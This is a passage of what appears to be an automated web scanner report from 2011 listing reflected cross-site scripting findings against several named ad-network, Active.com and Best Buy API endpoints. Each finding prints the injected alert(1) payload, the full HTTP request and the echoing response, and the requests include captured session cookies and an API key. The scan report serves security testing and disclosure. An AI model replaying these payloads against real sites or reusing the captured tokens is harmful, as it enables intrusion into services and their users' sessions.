document.write('<img height="0" width="0" style="display: none;" src="http://tag.admeld.com/match?admeld_adprovider_id=731428a';alert(1)//b1769215d63&external_user_id=3574436734868397339"/>');

1.155. http://admeld.lucidmedia.com/clicksense/admeld/match [admeld_callback parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://admeld.lucidmedia.com
Path:   /clicksense/admeld/match

Issue detail

The value of the admeld_callback request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 24449'%3balert(1)//0713bdddb9d was submitted in the admeld_callback parameter. This input was echoed as 24449';alert(1)//0713bdddb9d in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /clicksense/admeld/match?admeld_user_id=64775c16-cf5b-479e-8b02-d11a229fedb4&admeld_adprovider_id=73&admeld_call_type=js&admeld_callback=http://tag.admeld.com/match24449'%3balert(1)//0713bdddb9d HTTP/1.1
Host: admeld.lucidmedia.com
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/725/nydailynews/728x90/nydnros_atf?t=1313102149616&tz=300&m=0&hu=&ht=js&hp=0&fo=&url=http%3A%2F%2Fwww.nydailynews.com%2Findex.html&refer=
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: 2=36OwoKhw1oP

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Cache-control: no-cache, no-store
Pragma: no-cache
Date: Thu, 11 Aug 2011 22:35:17 GMT
Expires: Thu, 11 Aug 2011 22:35:17 GMT
P3P: CP="NOI ADM DEV CUR"
Set-Cookie: 2=36OwoKhw1oP; Domain=.lucidmedia.com; Expires=Fri, 10-Aug-2012 22:35:17 GMT; Path=/
Content-Type: text/plain
Content-Length: 192
Connection: close

document.write('<img height="0" width="0" style="display: none;" src="http://tag.admeld.com/match24449';alert(1)//0713bdddb9d?admeld_adprovider_id=73&external_user_id=3574436734868397339"/>');

1.156. http://adsfac.us/ag.asp [cc parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://adsfac.us
Path:   /ag.asp

Issue detail

The value of the cc request parameter is copied into the HTML document as plain text between tags. The payload 55836<script>alert(1)</script>67f7e0a0ca5 was submitted in the cc parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /ag.asp?cc=55836<script>alert(1)</script>67f7e0a0ca5&source=js&ord=2653272 HTTP/1.1
Host: adsfac.us
Proxy-Connection: keep-alive
Referer: http://www.informit.com/index.aspx
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.218 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Cache-Control: private
Pragma: no-cache
Content-Length: 293
Content-Type: text/html
Expires: Wed, 31 Aug 2011 17:53:41 GMT
Server: Microsoft-IIS/7.0
Set-Cookie: FS55836%3Cscript%3Ealert%281%29%3C%2Fscript%3E67f7e0a0ca50=uid=29247451; expires=Thu, 01-Sep-2011 17:54:40 GMT; domain=.adsfac.us; path=/
Set-Cookie: FS55836%3Cscript%3Ealert%281%29%3C%2Fscript%3E67f7e0a0ca5=pctl=0&fpt=0%2C0%2C&pct%5Fdate=4260&pctm=1&FM1=1&pctc=1&FL0=1&FQ=1; expires=Fri, 30-Sep-2011 17:54:40 GMT; domain=.adsfac.us; path=/
Set-Cookie: UserID=983108392662652; expires=Fri, 30-Sep-2011 17:54:40 GMT; domain=.adsfac.us; path=/
P3P: CP="NOI DSP COR CUR PSA OUR BUS UNI NAV INT"
Date: Wed, 31 Aug 2011 17:54:41 GMT
Connection: close

if (typeof(fd_clk) == 'undefined') {var fd_clk = 'http://adsfac.us/link.asp?cc=55836<script>alert(1)</script>67f7e0a0ca5.0.0&CreativeID=1';}document.write('<a href="'+fd_clk+'&CreativeID=1" target="_blank">
...[SNIP]...

1.157. http://api.active.com/REST/ZipDma/zip/75244 [callback parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://api.active.com
Path:   /REST/ZipDma/zip/75244

Issue detail

The value of the callback request parameter is copied into the HTML document as plain text between tags. The payload 76cc7<script>alert(1)</script>76faf0c8b84 was submitted in the callback parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /REST/ZipDma/zip/75244?output=json&callback=OX.AJAST.__callbacks__.callback376cc7<script>alert(1)</script>76faf0c8b84 HTTP/1.1
Host: api.active.com
Proxy-Connection: keep-alive
Referer: http://www.active.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.218 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: mdr_browser=desktop; mbox=check#true#1314814843|session#1314814782356-141992#1314816643; geozip=75244

Response

HTTP/1.1 200 OK
Date: Wed, 31 Aug 2011 18:20:35 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/json; charset=utf-8
Content-Length: 172

OX.AJAST.__callbacks__.callback376cc7<script>alert(1)</script>76faf0c8b84({"ZipCode":"75244","Latitude":"32.9366","Longitude":"-96.83800","DmaName":"Dallas - Fort Worth"});

1.158. http://api.active.com/REST/geotargeting/handler.ashx [callback parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://api.active.com
Path:   /REST/geotargeting/handler.ashx

Issue detail

The value of the callback request parameter is copied into the HTML document as plain text between tags. The payload 9953f<script>alert(1)</script>8b150904b00 was submitted in the callback parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /REST/geotargeting/handler.ashx?output=json&callback=OX.AJAST.__callbacks__.callback19953f<script>alert(1)</script>8b150904b00 HTTP/1.1
Host: api.active.com
Proxy-Connection: keep-alive
Referer: http://www.active.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.218 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: mdr_browser=desktop; mbox=check#true#1314814843|session#1314814782356-141992#1314816643

Response

HTTP/1.1 200 OK
Date: Wed, 31 Aug 2011 18:20:22 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/javascript; charset=utf-8
Content-Length: 248

OX.AJAST.__callbacks__.callback19953f<script>alert(1)</script>8b150904b00({
"location": {
"zip": "75244",
"city": "DALLAS",
"region": "TEXAS",
"country": "US",
"latitude": "32.7961",
"longitude": "-96.8024"
}
})

1.159. http://api.bbyremix.bestbuy.com/v1/products(digitalSku%3E%22%22&sku%20in(8412292,1211393,9984558,2044283,2077114,1257903)) [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://api.bbyremix.bestbuy.com
Path:   /v1/products(digitalSku%3E%22%22&sku%20in(8412292,1211393,9984558,2044283,2077114,1257903))

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 41be8<script>alert(1)</script>a2b3fb1c730 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /v141be8<script>alert(1)</script>a2b3fb1c730/products(digitalSku%3E%22%22&sku%20in(8412292,1211393,9984558,2044283,2077114,1257903))?dsku=true&show=sku,digitalSku&apiKey=tfuyteqkrnxfp3ye6kvpvk5e&callback=SDSTATIC&pageSize=99&format=json HTTP/1.1
Host: api.bbyremix.bestbuy.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.bestbuy.com/site/olstemplatemapper.jsp?_dyncharset=ISO-8859-1&id=pcat17071&type=page&ks=960&st=8412292%2C+1257903%2C+2077114%2C+9984558%2C+2044283%2C+1211393_&sc=Global&cp=1&sp=&qp=q383431323239322c20313235373930332c20323037373131342c20393938343535382c20323034343238332c20313231313339335f~~cpcmcat242800050021%23%231%23%236~~ncabcat0915000%23%232%23%236&list=y&usc=All+Categories&nrp=15&iht=n
Cookie: TLTSID=DA162D90C47310C46E489EF22AB313E6; groupabcd=b; groupabcde=c; newgroup3=a; newgroup2=b; newgroup=a; group2=a; group=a; DYN_USER_CONFIRM=8ebafb8ac84930570880799ec8058003; DYN_USER_ID=ATG12715437407; JSESSIONID=9974DE521797768FD85C043843E09A44.bbolsp-app01-48; TLTUID=DA162D90C47310C46E489EF22AB313E6; track={'lastPage':'PRPT','page':'Back%20to%20School','searchLastPage':'Back%20to%20School','lastCatId':'pcmcat245300050005','lid':'bts_FO7','tab':'["www.bestbuy.com/site/olstemplatemapper.jsp%3F_dyncharset%3DISO-8859-1%26id%3Dpcat17071%26type%3Dpage%26ks%3D960%26st%3D8412292%252C+1257903%252C+2077114%252C+9984558%252C+2044283%252C+1211393_%26sc%3DGlobal%26cp%3D1%26sp%3D%26qp%3Dq383431323239322c20313235373930332c20323037373131342c20393938343535382c20323034343238332c20313231313339335f%7E%7Ecpcmcat242800050021%2523%25231%2523%25236%7E%7Encabcat0915000%2523%25232%2523%25236%26list%3Dy%26usc%3DAll+Categories%26nrp%3D15%26iht%3Dn"]'}; s_cc=true; s_sq=bbymainprod%3D%2526pid%253DBack%252520to%252520School%2526pidt%253D1%2526oid%253Dhttp%25253A%25252F%25252Fwww.bestbuy.com%25252Fsite%25252Folstemplatemapper.jsp%25253F_dyncharset%25253DISO-8859-1%252526id%25253Dpcat17071%252526type%25253Dpage%252526k_4%2526oidt%253D1%2526ot%253DA%2526oi%253D1; fsr.s=%7B%22v%22%3A1%2C%22rid%22%3A%221313106328259_291120%22%2C%22ru%22%3A%22http%3A%2F%2Fwww.fakereferrerdominator.com%2FreferrerPathName%3FRefParName%3DRefValue%22%2C%22r%22%3A%22www.fakereferrerdominator.com%22%2C%22st%22%3A%22%22%2C%22to%22%3A3%2C%22c%22%3A%22http%3A%2F%2Fwww.bestbuy.com%2Fsite%2FMisc%2FBack-to-School%2Fpcmcat245300050005.c%22%2C%22pv%22%3A1%2C%22lc%22%3A%7B%22d3%22%3A%7B%22v%22%3A1%2C%22s%22%3Atrue%7D%7D%2C%22cd%22%3A3%2C%22sd%22%3A3%2C%22cp%22%3A%7B%22orderDate%22%3A%2208%2F11%2F2011%22%2C%22TLSessionID%22%3A%22DA162D90C47310C46E489EF22AB313E6%22%7D%2C%22f%22%3A1313106400684%7D; s_vi=[CS]v1|272234B3851D0894-40000144C060C985[CE]; ci_IcsCsid=; fsr.a=1313106408894

Response

HTTP/1.1 200 OK
X-Mashery-Responder: mashery-web2.ATL
Etag: "c249f30611bc95d631a0e432ffe6fe95"
X-Runtime: 1
Content-Type: application/x-javascript; charset=UTF-8
Cache-Control: private, max-age=0, must-revalidate
Connection: close
Server: thin 1.2.11 codename Bat-Shit Crazy
Accept-Ranges: bytes
Content-Length: 2390
Date: Thu, 11 Aug 2011 23:47:29 GMT

SDSTATIC({
"error": {
"examples": [
"/v1/products/8880044.xml?apiKey=<YourApiKey> : Get product with sku 8880044, as xml",
"/v1/products/8880044.json?apiKey=<YourApiKey> : 8880044, a
...[SNIP]...
<YourApiKey> : All stores within 10 miles of the latitude 38.89 and longitude -77.03"
],
"code": 400,
"message": "Couldn't understand '/v141be8<script>alert(1)</script>a2b3fb1c730/products(digitalSku>
...[SNIP]...

1.160. http://api.bbyremix.bestbuy.com/v1/products(digitalSku%3E%22%22&sku%20in(8412292,1211393,9984558,2044283,2077114,1257903)) [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://api.bbyremix.bestbuy.com
Path:   /v1/products(digitalSku%3E%22%22&sku%20in(8412292,1211393,9984558,2044283,2077114,1257903))

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 5c0e2<script>alert(1)</script>a5010c4844b was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /v1/products(digitalSku%3E%22%225c0e2<script>alert(1)</script>a5010c4844b&sku%20in(8412292,1211393,9984558,2044283,2077114,1257903))?dsku=true&show=sku,digitalSku&apiKey=tfuyteqkrnxfp3ye6kvpvk5e&callback=SDSTATIC&pageSize=99&format=json HTTP/1.1
Host: api.bbyremix.bestbuy.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.bestbuy.com/site/olstemplatemapper.jsp?_dyncharset=ISO-8859-1&id=pcat17071&type=page&ks=960&st=8412292%2C+1257903%2C+2077114%2C+9984558%2C+2044283%2C+1211393_&sc=Global&cp=1&sp=&qp=q383431323239322c20313235373930332c20323037373131342c20393938343535382c20323034343238332c20313231313339335f~~cpcmcat242800050021%23%231%23%236~~ncabcat0915000%23%232%23%236&list=y&usc=All+Categories&nrp=15&iht=n
Cookie: TLTSID=DA162D90C47310C46E489EF22AB313E6; groupabcd=b; groupabcde=c; newgroup3=a; newgroup2=b; newgroup=a; group2=a; group=a; DYN_USER_CONFIRM=8ebafb8ac84930570880799ec8058003; DYN_USER_ID=ATG12715437407; JSESSIONID=9974DE521797768FD85C043843E09A44.bbolsp-app01-48; TLTUID=DA162D90C47310C46E489EF22AB313E6; track={'lastPage':'PRPT','page':'Back%20to%20School','searchLastPage':'Back%20to%20School','lastCatId':'pcmcat245300050005','lid':'bts_FO7','tab':'["www.bestbuy.com/site/olstemplatemapper.jsp%3F_dyncharset%3DISO-8859-1%26id%3Dpcat17071%26type%3Dpage%26ks%3D960%26st%3D8412292%252C+1257903%252C+2077114%252C+9984558%252C+2044283%252C+1211393_%26sc%3DGlobal%26cp%3D1%26sp%3D%26qp%3Dq383431323239322c20313235373930332c20323037373131342c20393938343535382c20323034343238332c20313231313339335f%7E%7Ecpcmcat242800050021%2523%25231%2523%25236%7E%7Encabcat0915000%2523%25232%2523%25236%26list%3Dy%26usc%3DAll+Categories%26nrp%3D15%26iht%3Dn"]'}; s_cc=true; s_sq=bbymainprod%3D%2526pid%253DBack%252520to%252520School%2526pidt%253D1%2526oid%253Dhttp%25253A%25252F%25252Fwww.bestbuy.com%25252Fsite%25252Folstemplatemapper.jsp%25253F_dyncharset%25253DISO-8859-1%252526id%25253Dpcat17071%252526type%25253Dpage%252526k_4%2526oidt%253D1%2526ot%253DA%2526oi%253D1; fsr.s=%7B%22v%22%3A1%2C%22rid%22%3A%221313106328259_291120%22%2C%22ru%22%3A%22http%3A%2F%2Fwww.fakereferrerdominator.com%2FreferrerPathName%3FRefParName%3DRefValue%22%2C%22r%22%3A%22www.fakereferrerdominator.com%22%2C%22st%22%3A%22%22%2C%22to%22%3A3%2C%22c%22%3A%22http%3A%2F%2Fwww.bestbuy.com%2Fsite%2FMisc%2FBack-to-School%2Fpcmcat245300050005.c%22%2C%22pv%22%3A1%2C%22lc%22%3A%7B%22d3%22%3A%7B%22v%22%3A1%2C%22s%22%3Atrue%7D%7D%2C%22cd%22%3A3%2C%22sd%22%3A3%2C%22cp%22%3A%7B%22orderDate%22%3A%2208%2F11%2F2011%22%2C%22TLSessionID%22%3A%22DA162D90C47310C46E489EF22AB313E6%22%7D%2C%22f%22%3A1313106400684%7D; s_vi=[CS]v1|272234B3851D0894-40000144C060C985[CE]; ci_IcsCsid=; fsr.a=1313106408894

Response

HTTP/1.1 200 OK
X-Mashery-Responder: mashery-web2.ATL
Etag: "87206ffb76a3962125256ec1d025e43c"
X-Runtime: 2
Content-Type: application/x-javascript; charset=UTF-8
Cache-Control: private, max-age=0, must-revalidate
Connection: close
Server: thin 1.2.11 codename Bat-Shit Crazy
Accept-Ranges: bytes
Content-Length: 2390
Date: Thu, 11 Aug 2011 23:47:31 GMT

SDSTATIC({
"error": {
"examples": [
"/v1/products/8880044.xml?apiKey=<YourApiKey> : Get product with sku 8880044, as xml",
"/v1/products/8880044.json?apiKey=<YourApiKey> : 8880044, a
...[SNIP]...
<YourApiKey> : All stores within 10 miles of the latitude 38.89 and longitude -77.03"
],
"code": 400,
"message": "Couldn't understand '/v1/products(digitalSku>\"\"5c0e2<script>alert(1)</script>a5010c4844b&sku in(8412292,1211393,9984558,2044283,2077114,1257903))?dsku=true&show=sku,digitalSku&apiKey=tfuyteqkrnxfp3ye6kvpvk5e&callback=SDSTATIC&pageSize=99&format=json'",
"status": "400 Bad Request"
}

...[SNIP]...

1.161. http://api.bbyremix.bestbuy.com/v1/products(digitalSku%3E%22%22&sku%20in(8412292,1211393,9984558,2044283,2077114,1257903)) [callback parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://api.bbyremix.bestbuy.com
Path:   /v1/products(digitalSku%3E%22%22&sku%20in(8412292,1211393,9984558,2044283,2077114,1257903))

Issue detail

The value of the callback request parameter is copied into the HTML document as plain text between tags. The payload a72bd<script>alert(1)</script>f8c76327bfb was submitted in the callback parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /v1/products(digitalSku%3E%22%22&sku%20in(8412292,1211393,9984558,2044283,2077114,1257903))?dsku=true&show=sku,digitalSku&apiKey=tfuyteqkrnxfp3ye6kvpvk5e&callback=SDSTATICa72bd<script>alert(1)</script>f8c76327bfb&pageSize=99&format=json HTTP/1.1
Host: api.bbyremix.bestbuy.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.bestbuy.com/site/olstemplatemapper.jsp?_dyncharset=ISO-8859-1&id=pcat17071&type=page&ks=960&st=8412292%2C+1257903%2C+2077114%2C+9984558%2C+2044283%2C+1211393_&sc=Global&cp=1&sp=&qp=q383431323239322c20313235373930332c20323037373131342c20393938343535382c20323034343238332c20313231313339335f~~cpcmcat242800050021%23%231%23%236~~ncabcat0915000%23%232%23%236&list=y&usc=All+Categories&nrp=15&iht=n
Cookie: TLTSID=DA162D90C47310C46E489EF22AB313E6; groupabcd=b; groupabcde=c; newgroup3=a; newgroup2=b; newgroup=a; group2=a; group=a; DYN_USER_CONFIRM=8ebafb8ac84930570880799ec8058003; DYN_USER_ID=ATG12715437407; JSESSIONID=9974DE521797768FD85C043843E09A44.bbolsp-app01-48; TLTUID=DA162D90C47310C46E489EF22AB313E6; track={'lastPage':'PRPT','page':'Back%20to%20School','searchLastPage':'Back%20to%20School','lastCatId':'pcmcat245300050005','lid':'bts_FO7','tab':'["www.bestbuy.com/site/olstemplatemapper.jsp%3F_dyncharset%3DISO-8859-1%26id%3Dpcat17071%26type%3Dpage%26ks%3D960%26st%3D8412292%252C+1257903%252C+2077114%252C+9984558%252C+2044283%252C+1211393_%26sc%3DGlobal%26cp%3D1%26sp%3D%26qp%3Dq383431323239322c20313235373930332c20323037373131342c20393938343535382c20323034343238332c20313231313339335f%7E%7Ecpcmcat242800050021%2523%25231%2523%25236%7E%7Encabcat0915000%2523%25232%2523%25236%26list%3Dy%26usc%3DAll+Categories%26nrp%3D15%26iht%3Dn"]'}; s_cc=true; s_sq=bbymainprod%3D%2526pid%253DBack%252520to%252520School%2526pidt%253D1%2526oid%253Dhttp%25253A%25252F%25252Fwww.bestbuy.com%25252Fsite%25252Folstemplatemapper.jsp%25253F_dyncharset%25253DISO-8859-1%252526id%25253Dpcat17071%252526type%25253Dpage%252526k_4%2526oidt%253D1%2526ot%253DA%2526oi%253D1; fsr.s=%7B%22v%22%3A1%2C%22rid%22%3A%221313106328259_291120%22%2C%22ru%22%3A%22http%3A%2F%2Fwww.fakereferrerdominator.com%2FreferrerPathName%3FRefParName%3DRefValue%22%2C%22r%22%3A%22www.fakereferrerdominator.com%22%2C%22st%22%3A%22%22%2C%22to%22%3A3%2C%22c%22%3A%22http%3A%2F%2Fwww.bestbuy.com%2Fsite%2FMisc%2FBack-to-School%2Fpcmcat245300050005.c%22%2C%22pv%22%3A1%2C%22lc%22%3A%7B%22d3%22%3A%7B%22v%22%3A1%2C%22s%22%3Atrue%7D%7D%2C%22cd%22%3A3%2C%22sd%22%3A3%2C%22cp%22%3A%7B%22orderDate%22%3A%2208%2F11%2F2011%22%2C%22TLSessionID%22%3A%22DA162D90C47310C46E489EF22AB313E6%22%7D%2C%22f%22%3A1313106400684%7D; s_vi=[CS]v1|272234B3851D0894-40000144C060C985[CE]; ci_IcsCsid=; fsr.a=1313106408894

Response

HTTP/1.1 200 OK
X-Mashery-Responder: mashery-web3.ATL
Etag: "ea0512bd5b72bf72e903baee31b4adcc"
X-Runtime: 27
Content-Type: application/x-javascript; charset=UTF-8
Cache-Control: private, max-age=0, must-revalidate
Connection: close
Server: thin 1.2.11 codename Bat-Shit Crazy
Accept-Ranges: bytes
Content-Length: 405
Date: Thu, 11 Aug 2011 23:47:19 GMT

SDSTATICa72bd<script>alert(1)</script>f8c76327bfb({
"queryTime": "0.007",
"currentPage": 1,
"totalPages": 0,
"partial": false,
"from": 1,
"total": 0,
"to": 0,
"products": [

],
"canonicalUrl": "/v1/products(digitalSku>
...[SNIP]...

1.162. http://api.bbyremix.bestbuy.com/v1/products(digitalSku%3E%22%22&sku%20in(8412292,1211393,9984558,2044283,2077114,1257903)) [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://api.bbyremix.bestbuy.com
Path:   /v1/products(digitalSku%3E%22%22&sku%20in(8412292,1211393,9984558,2044283,2077114,1257903))

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 286a6<script>alert(1)</script>220fe19ac5d was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /v1/products(digitalSku%3E%22%22&sku%20in(8412292,1211393,9984558,2044283,2077114,1257903))?dsku=true&show=sku,digitalSku&apiKey=tfuyteqkrnxfp3ye6kvpvk5e&callback=SDSTATIC&pageSize=99&format=json&286a6<script>alert(1)</script>220fe19ac5d=1 HTTP/1.1
Host: api.bbyremix.bestbuy.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.bestbuy.com/site/olstemplatemapper.jsp?_dyncharset=ISO-8859-1&id=pcat17071&type=page&ks=960&st=8412292%2C+1257903%2C+2077114%2C+9984558%2C+2044283%2C+1211393_&sc=Global&cp=1&sp=&qp=q383431323239322c20313235373930332c20323037373131342c20393938343535382c20323034343238332c20313231313339335f~~cpcmcat242800050021%23%231%23%236~~ncabcat0915000%23%232%23%236&list=y&usc=All+Categories&nrp=15&iht=n
Cookie: TLTSID=DA162D90C47310C46E489EF22AB313E6; groupabcd=b; groupabcde=c; newgroup3=a; newgroup2=b; newgroup=a; group2=a; group=a; DYN_USER_CONFIRM=8ebafb8ac84930570880799ec8058003; DYN_USER_ID=ATG12715437407; JSESSIONID=9974DE521797768FD85C043843E09A44.bbolsp-app01-48; TLTUID=DA162D90C47310C46E489EF22AB313E6; track={'lastPage':'PRPT','page':'Back%20to%20School','searchLastPage':'Back%20to%20School','lastCatId':'pcmcat245300050005','lid':'bts_FO7','tab':'["www.bestbuy.com/site/olstemplatemapper.jsp%3F_dyncharset%3DISO-8859-1%26id%3Dpcat17071%26type%3Dpage%26ks%3D960%26st%3D8412292%252C+1257903%252C+2077114%252C+9984558%252C+2044283%252C+1211393_%26sc%3DGlobal%26cp%3D1%26sp%3D%26qp%3Dq383431323239322c20313235373930332c20323037373131342c20393938343535382c20323034343238332c20313231313339335f%7E%7Ecpcmcat242800050021%2523%25231%2523%25236%7E%7Encabcat0915000%2523%25232%2523%25236%26list%3Dy%26usc%3DAll+Categories%26nrp%3D15%26iht%3Dn"]'}; s_cc=true; s_sq=bbymainprod%3D%2526pid%253DBack%252520to%252520School%2526pidt%253D1%2526oid%253Dhttp%25253A%25252F%25252Fwww.bestbuy.com%25252Fsite%25252Folstemplatemapper.jsp%25253F_dyncharset%25253DISO-8859-1%252526id%25253Dpcat17071%252526type%25253Dpage%252526k_4%2526oidt%253D1%2526ot%253DA%2526oi%253D1; fsr.s=%7B%22v%22%3A1%2C%22rid%22%3A%221313106328259_291120%22%2C%22ru%22%3A%22http%3A%2F%2Fwww.fakereferrerdominator.com%2FreferrerPathName%3FRefParName%3DRefValue%22%2C%22r%22%3A%22www.fakereferrerdominator.com%22%2C%22st%22%3A%22%22%2C%22to%22%3A3%2C%22c%22%3A%22http%3A%2F%2Fwww.bestbuy.com%2Fsite%2FMisc%2FBack-to-School%2Fpcmcat245300050005.c%22%2C%22pv%22%3A1%2C%22lc%22%3A%7B%22d3%22%3A%7B%22v%22%3A1%2C%22s%22%3Atrue%7D%7D%2C%22cd%22%3A3%2C%22sd%22%3A3%2C%22cp%22%3A%7B%22orderDate%22%3A%2208%2F11%2F2011%22%2C%22TLSessionID%22%3A%22DA162D90C47310C46E489EF22AB313E6%22%7D%2C%22f%22%3A1313106400684%7D; s_vi=[CS]v1|272234B3851D0894-40000144C060C985[CE]; ci_IcsCsid=; fsr.a=1313106408894

Response

HTTP/1.1 200 OK
X-Mashery-Responder: mashery-web1.ATL
Etag: "d819595c8f6b5189ddd1afee9b4ff855"
X-Runtime: 5
Content-Type: application/x-javascript; charset=UTF-8
Cache-Control: private, max-age=0, must-revalidate
Connection: close
Server: thin 1.2.11 codename Bat-Shit Crazy
Accept-Ranges: bytes
Content-Length: 2393
Date: Thu, 11 Aug 2011 23:47:27 GMT

SDSTATIC({
"error": {
"examples": [
"/v1/products/8880044.xml?apiKey=<YourApiKey> : Get product with sku 8880044, as xml",
"/v1/products/8880044.json?apiKey=<YourApiKey> : 8880044, a
...[SNIP]...
nderstand '/v1/products(digitalSku>\"\"&sku in(8412292,1211393,9984558,2044283,2077114,1257903))?dsku=true&show=sku,digitalSku&apiKey=tfuyteqkrnxfp3ye6kvpvk5e&callback=SDSTATIC&pageSize=99&format=json&286a6<script>alert(1)</script>220fe19ac5d=1'",
"status": "400 Bad Request"
}
})

1.163. http://api.bbyremix.bestbuy.com/v1/products(digitalSku%3E%22%22&sku%20in(8412292,1211393,9984558,2044283,2077114,1257903)) [pageSize parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://api.bbyremix.bestbuy.com
Path:   /v1/products(digitalSku%3E%22%22&sku%20in(8412292,1211393,9984558,2044283,2077114,1257903))

Issue detail

The value of the pageSize request parameter is copied into the HTML document as plain text between tags. The payload 33863<script>alert(1)</script>d7fd7ee2f10 was submitted in the pageSize parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /v1/products(digitalSku%3E%22%22&sku%20in(8412292,1211393,9984558,2044283,2077114,1257903))?dsku=true&show=sku,digitalSku&apiKey=tfuyteqkrnxfp3ye6kvpvk5e&callback=SDSTATIC&pageSize=9933863<script>alert(1)</script>d7fd7ee2f10&format=json HTTP/1.1
Host: api.bbyremix.bestbuy.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.bestbuy.com/site/olstemplatemapper.jsp?_dyncharset=ISO-8859-1&id=pcat17071&type=page&ks=960&st=8412292%2C+1257903%2C+2077114%2C+9984558%2C+2044283%2C+1211393_&sc=Global&cp=1&sp=&qp=q383431323239322c20313235373930332c20323037373131342c20393938343535382c20323034343238332c20313231313339335f~~cpcmcat242800050021%23%231%23%236~~ncabcat0915000%23%232%23%236&list=y&usc=All+Categories&nrp=15&iht=n
